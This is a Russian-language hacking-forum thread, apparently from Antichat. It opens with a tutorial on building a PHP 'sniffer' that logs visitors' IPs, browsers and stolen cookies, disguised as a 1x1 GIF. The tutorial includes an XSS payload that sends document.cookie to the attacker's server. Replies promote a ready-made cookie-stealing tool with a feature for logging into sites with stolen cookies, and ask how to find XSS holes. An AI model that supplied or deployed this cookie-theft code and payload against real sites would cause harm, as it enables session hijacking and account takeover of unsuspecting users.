Многие, скорее всего, пользовались ачатовским сниффером. Многие знали как он работает, многие даже не догадывались. Вот для вторых и предназначена эта статья. В этой статье гуру ачата и профи программеры ничего нового для себя не найдут. Итак, начнём. Для начала теория. Что такое сниффер? Цитата из википедии Мы будем писать скрипт, который позволяет получать какие-то сведения о тех, кто заходит к вам на страницу. Какие сведения можно получать сниффером? Да почти любые, начиная от IP адреса жертвы, заканчивая coockies. Зачем это надо? Если у вас возник такой вопрос, то эта статья, скорее всего, вам не пригодиться. Итак, поехали... Что нам надо для создания собственного сниффера? мозг и ровные руки хостинг с поддержкой PHP Для начала повторюсь. Задачей нашего сниффера будет сбор информации о жертве, зашедшей на наш сайт и сохранение этой информации в файле. Создаём 2 файла - sniff.php и log.txt Заполняем файл sniff.php. Для понимая того, что мы делаем, мы будем сейчас работать со стандартными переменнымы. Переменная file будет хранить название и путь к файлу log.txt, нашему файлу с результатами: $file=”log.txt”; Теперь объявим переменные, в которых будет хранится информация о дате и времени посещения страницы. PHP: $data=date("D.M.Y"); //в скобках прописан формат отображения даты D - день недели, M - месяц Y - год. $time=date("h:i"); //в скобках прописан формат отображения времени h - часы, i - минуты Теперь нам нужно собрать инфрмацию о посетителе. Что может лучше описать посетителя, чем его IP адресс и информация о системе? PHP: $ip=trim($_SERVER['REMOTE_ADDR']); $sysinfo=trim($_SERVER['HTTP_USER_AGENT']); // это стандартные переменные, которые автоматом принимает сервер Теперь пишем основной код PHP: if(is_file($file)){ //Проверяем наличие файла и возможность работы с ним $fo=fopen($file,"a"); //Открываем файл на запись в конец $res="$data | $time | $ip | $sysinfo \n"; //Формируем строку с информацией от жертвы //в формате дата|время|ip-адрес|характеристика системы //переход на следующую строку n $fw=fwrite($fo,$res); //Записываем в файл fclose($fo); //Закрываем файл } Сниффер готов. Заливаем его на любой хост с PHP и проверяем его работу. Заходим на страницу sniff.php и видим белый экран без ошибок - значит всё сделали правильно. Теперь смотрим содержимое файла log.txt. Оно должно быть примерно следующего содержания: Что теперь с ним делать? Да ничего почти. Для серьёзных вещей он не подходит. Для серьёзных и интересных вещей нам нужно уметь пользоваться куками. Что такое cookies? Так что всё в ваших руках... Юзаем свой мозг и гугль, совершенствуемся... Для тех, кому лень это делать продолжаю статью. Для того, чтобы украсть чужие куки нам нелбходимо: всё, что нужно было для создания простого сниффера Для начала создадим картинку, размером 1х1 пиксель(для примера). Далее, в файл sniff.php добавляем переменную PHP: $query=trim($HTTP_GET_VARS['cook']); Не забываем добавить эту переменную на запись в файл PHP: $res="$data | $time | $ip | $sysinfo \n $query \n"; //Формируем строку с информацией от жертвы Так же отображаем нашу 1х1 картинку: PHP: Header("Content-type: image/png"); $im = ImageCreateFromGif("путь_к_вашей_картинке"); ImageGif($im); ImageDestroy($im); Переименовываем наш sniff.php в sniff.gif и создаём на серваке файл .htaccess со следующем текстом: Теперь пишем скрипт, который будет находиться на сайте жертвы, и передавать нам с него все куки: HTML: <script>img = new Image(); img.src = "http://путь_к_вашему_снифферу/sniff.gif?cook='+document.cookie;</script> В этом скрипте мы получаем куки и отправляем их нашему скрипту в переменной cook. Проверяем работу скрипта. Писал без кофе и пива, так что мог что-то забыть. Почитаю коментарии и доделаю статью с утра. Всем спасибо.
а модераторы сего раздела в отпуске или "пишут свой сниффер?". ---Модераторы смотрят отзывы. И твой в том числе. Что то я конструктивной критики лично в твоем посте не наблюдаю. Посмотрим что еще скажут люди. Alexsize + 5 Alexsize -=lebed=-
Хочешь сказать у тебя есть описание как они работают? По программной части может и есть, а вот как происходит передача кук из твоего поста я например непонял... Он перехватывает куки, как?! Нет объяснения, что при загрузке скрипта браузером с нашего сервера где сниффер, грузится картинка с параметрами кукисов, которые получаются из функции жаваскрипта document.cookie и т.д. и т.п. и поехали дальше...
омг, очередной пятиколёсный велосипед =\ сниф каника рулит, как ни крути!!! - http://kanick.ru/sniffer/ описалово: Вот краткий обзор функционала сниффера: * красивый, интуитивно понятный интерфейс, в котором всё учтено * поддержка всех известных браузеров * система фильтров, позволяющая отбирать из лога только нужные записи * фильтрация запросов (еще до попадения в лог) * функция “Волшебная палочка”, позволяющая быстро заходить на сайт с украденными cookies * удаление отмеченных записей * помечание новых записей * возможность авторизованного доступа * отправка оповещений на e-mail, ICQ — new! * поддержка различных стилей оформления (4 стиля в комплекте) * совместимость с предыдущими версиями (достаточно перенести файл data.txt) * экспорт (сохранение) данных — new! * подробный FAQ …и многое другое. + http://old.antichat.ru/sniff/ ещё можно почитать: http://old.antichat.ru/txt/old/cookie.shtml http://old.antichat.ru/crackchat/HTML/ и http://old.antichat.ru/txt/utf7/
Не ф тему просто так получилось)Щас поднимаю веб сервак и скачиваю все нужные мне дистрибитивы.Так вот к чему пишу то ,все уже в курсе что четвертая ветка умерает в конце этого года и официально поддерживаться больше не будет))
Почему? Делал всё как ты писал! - Чё-то вообще ничего не работает.. Скачал "php Based Sniffer [phpBS] v2.xx © Kanick 2005 Модифицирован АНТИЧАТ.РУ" - Всё в норме... Не могу разобраться почему?
Как... http://video.antichat.ru/file232.html "Я нашол в течене 30 минут" А как искать xss? Та, которая на видео больше не пашет...
лол чувак этих статей по нету целая куча можно просто взять какой нить готовый снифер и вписать туда немногго своих функции и сделать интерфейс покасивее
да и еще одно ты быхоть когда статью писал изменил бы немногоскрипт $res="$data | $time | $ip | $sysinfo \n $query \n"; // а то вот это уж больно знакомое копираиты лучше дай
почему реально просто вт такой же последовательности думаю это уже что то не то а статью про снифер это просто глупо можно как я уже писал выше скачать готовый а изобретать велосипед не надо !!
Оффтопs Свой вариант снифера: PHP: <? Error_Reporting(E_ALL & ~E_NOTICE); $dt=date('Y-m-d [H:i:s]'); $fp=fopen('log.txt', a) ; $log = $_SERVER['REMOTE_ADDR']."". $data. "<br>Дата :: "."". $dt."<br>Софт :: ". getenv("HTTP_USER_AGENT").".<p><hr></p>"; fwrite($fp, $log); ?> Скрипт сам создаёт файл лога или вписывает в существующий. Далие инклудится в log.php и просматриваем лог как удобный html документ в виде списка). Уже год сидит и трудится на холме.ру просто для разницы результата, без подвохов: 2heks, "велосипеды" бывают разных видов...)
2 XHTTP: У меня твой сниффер всё время один и тот же ip даёт: 127.0.0.1 Тема Closed, ввиду очевидности изложенной информации по сабжу. -=lebed=-